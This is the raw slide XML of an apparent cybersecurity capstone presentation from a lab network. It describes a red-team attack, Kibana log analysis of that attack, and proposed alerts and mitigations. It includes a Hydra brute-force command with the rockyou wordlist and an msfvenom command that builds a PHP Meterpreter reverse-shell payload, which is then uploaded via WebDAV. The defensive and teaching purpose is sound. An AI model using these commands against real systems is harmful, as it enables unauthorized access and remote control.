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C34F2E-1C28-4798-924D-E9237ACDF611}">
  <a:tblStyle styleId="{14C34F2E-1C28-4798-924D-E9237ACDF6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1398d944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1398d944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7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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71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101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Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.jpg"/><Relationship Id="rId5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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image102.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9790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694025" y="4022150"/>
            <a:ext cx="7971900" cy="4896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                                                                                         </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>Presented by:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ognen Nastoski</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="19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1)</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;112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14200" y="1310925"/>
            <a:ext cx="1419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After I created the malicious payload (shell.php), I used the information that I found in the secret_folder on how to connect to the company’s WebDAV server. From inside the WebDAV I uploaded the shell.php by right clicking on the file that was in my root folder, and then send to webdav.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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1671844" y="917090"/>
            <a:ext cx="533372" cy="538517"/>
            <a:chOff x="-1572934" y="1416862"/>
            <a:chExt cx="695400" cy="702017"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1134" name="Google Shape;1134;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1572934" y="141686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-1395391" y="1930254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1318975" y="1480575"/>
            <a:ext cx="13560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 exploit established a reverse shell session with my Kali machine and gave me an interactive shell Meterpreter. From the Meterpreter I was able to access all the files and find the flag.txt. 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5316681" y="734740"/>
            <a:ext cx="533372" cy="523955"/>
            <a:chOff x="-608511" y="1222624"/>
            <a:chExt cx="695400" cy="683033"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-608511" y="122262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-430984" y="171703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350" y="1310925"/>
            <a:ext cx="4410925" cy="1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099" y="2794274"/>
            <a:ext cx="2127599" cy="1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50" y="2794274"/>
            <a:ext cx="265841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2)</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;11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00" y="716950"/>
            <a:ext cx="4994926" cy="41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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1163" name="Google Shape;11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0" y="701525"/>
            <a:ext cx="2634065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900" y="732600"/>
            <a:ext cx="6178326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975" y="2805675"/>
            <a:ext cx="4453395" cy="2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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-320675" y="3338000"/>
            <a:ext cx="4544700" cy="1883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initial port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>February 3, 2022 at 00:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>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264,877</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> packets sent from IPv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr b="1"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spike in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>Connections over time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>, and the spike in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>Errors vs successful transactions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> indicate the port scan.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67" name="Google Shape;1167;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335788" y="2937800"/>
            <a:ext cx="22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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-282175" y="3285300"/>
            <a:ext cx="4731900" cy="2343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request occurred on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>February 3, 2022 at 00:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>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32,183 requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> made for the secret_folder.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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> was requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>2 times</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>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file contained the Ryan’s hashed password and information on how to connect to the company’s WebDAV server.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74" name="Google Shape;11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100" y="3068900"/>
            <a:ext cx="4431250" cy="1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100"/>
            <a:ext cx="8839201" cy="21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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378200" y="2951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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-205100" y="3728375"/>
            <a:ext cx="3752700" cy="18963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Hydra made </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>32,171 requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> to discover the password.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Only </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> were successful.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1183" name="Google Shape;11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5" y="709250"/>
            <a:ext cx="7842276" cy="24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725" y="3115876"/>
            <a:ext cx="5565575" cy="1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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455300" y="33432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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-235950" y="1317275"/>
            <a:ext cx="3344100" cy="1634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276 requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> made to webdav directory. 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files </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> were requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1192" name="Google Shape;11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62" y="672575"/>
            <a:ext cx="4718925" cy="2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050" y="2750875"/>
            <a:ext cx="7333877" cy="21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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401325" y="979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a single IP address sends a large amount of traffic in a very short period (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>milliseconds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>), an alert should be triggered.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lang="en" sz="1100"/>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> should be set at five requests per second from a single IP address.</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;120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In order to block port scans, we need to enable filters 7000 to 7004 and 7016 on the host machine.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active firewall that will block all unnecessary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> and ICMP Ping requests.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Using a Portspoof program.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4" name="Google Shape;1214;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-254150" y="1602450"/>
            <a:ext cx="5074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that will be triggered after a certain number of failed logins.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also be set for any request made to access this directory from outside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>’s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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> should be set at five failed logins per minute.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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280150" y="1602450"/>
            <a:ext cx="525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Two-factor authentication should be used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> this directory, and the use of more complex username and password.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Properly configured IDS should be placed that will block attackers from accessing the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directory should not be publicly available.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name should be changed to remove the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>temptation.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Whitelisting specific IP addresses that can access it.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7" name="Google Shape;1027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8" name="Google Shape;102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1" name="Google Shape;1221;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-169325" y="1604700"/>
            <a:ext cx="4850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 an alert on certain number of returned code 401 (unauthorized response).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 should be set at five per minute from a single IP address, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>twenty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> per hour from any IP address.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2" name="Google Shape;1222;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1489025"/>
            <a:ext cx="4933800" cy="3531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 IP addresses that do unauthorized activities over certain number of times.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Disable Root SSH logins.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Creating unique login URLs.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of CAPTCHA, two-factor authentication, strong passwords, limit of login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>, and monitoring IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>addresses,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> can prevent Brute Force Attacks.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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-92200" y="1604700"/>
            <a:ext cx="49431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should be triggered if unauthorized machine is trying to access this directory.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attempt of unauthorized machine accessing this directory should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> this alert.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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4810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shared folders should not be public facing.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WebDAV uploads should be allowed only to whitelisted IP addresses.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machine should be placed behind a properly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> firewall.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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-61375" y="1604700"/>
            <a:ext cx="4889100" cy="3588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.php file uploaded to the machine.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traffic going over port 4444, because that is the port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> used for meterpreter.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event in which .php file is uploaded, and traffic is going via port 4444 should trigger an alert, so it can be investigated whether it is legitimate or not.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6" name="Google Shape;1236;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="47796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Uploading files to this directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t> from inside the company’s network should be blocked.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the files uploaded to this directory should be checked by antivirus.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Blocking of uploading files from the web, and validating all uploaded files from inside the company’s network will solve the issue.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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490850" y="4442325"/>
            <a:ext cx="44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Ognen Nastoski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February 10, 2022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1" name="Google Shape;1051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r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.0/24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255.255.255.0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Windows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ML-REFVM-684427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ELK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192.168.1.105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Capstone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192.168.1.90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Kali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8" name="Google Shape;10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650375"/>
            <a:ext cx="6664799" cy="4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2" name="Google Shape;1072;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="398700" y="11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{14C34F2E-1C28-4798-924D-E9237ACDF611}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 (Serves as a host for three Virtual Machines)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used for attacking the Linux web server (penetration testing).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holds a Kibana dashboard, and is used for analysing the log files coming from the Capstone.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target machine on which are installed Filebeat and Metricbeat, that are forwarded to the ELK.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253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9" name="Google Shape;1079;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="473825" y="108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{14C34F2E-1C28-4798-924D-E9237ACDF611}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2360550"/>
                <a:gridCol w="321445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execute a shell command (to obtain a reverse shell with user privilege).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will gain a remote access to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(LFI)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 app vulnerability in which an attacker tricks the app to run unintended back-end code or script that are local to the app filesystem.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upload a malicious payload int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in which the attacker is attempting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password by trying many possible combination of letters, numbers, and symbols.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find the correct password and gain access to the target account.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Exploitation of misconfigured version of WebDAV to get shell access.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get a shell access into the target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     Local File Inclusion (LFI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0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First, I created a malicious payload by using msfvenom, (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-p php/meterpreter/reverse_tcp -o shell.php lhost=192.168.1.90 lport=4444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) and than, I uploaded the payload to the target machine via WebDAV.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Second, I executed the payload from inside the Metasploit.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2213838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gave me access to the target machine by creating a remote listener and provided me an interactive shell Meterpreter.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50" y="1481375"/>
            <a:ext cx="3894049" cy="6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912" y="2970537"/>
            <a:ext cx="1659638" cy="151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075" y="2160850"/>
            <a:ext cx="2810651" cy="269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Brute Force Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1107" name="Google Shape;1107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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1195600"/>
            <a:ext cx="2371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 exploit this vulnerability I used the Hydra tool, and the “Rockyou” password list.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(hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f - vV 192.168.1.105 http-get /company_folders/secret_folder/)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426356" y="7404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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="426356" y="3164703"/>
            <a:ext cx="533372" cy="544105"/>
            <a:chOff x="-3221288" y="4642109"/>
            <a:chExt cx="695400" cy="709301"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1113" name="Google Shape;1113;p62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3221288" y="464210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-3131571" y="516278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86563" y="36317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exploit provided me the Ashton’s password which was required to access the “secret_folder”.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5424631" y="740403"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="-467768" y="1185552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-467768" y="118555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-290241" y="169237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50" y="3937950"/>
            <a:ext cx="4788774" cy="7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838" y="1326863"/>
            <a:ext cx="5327801" cy="24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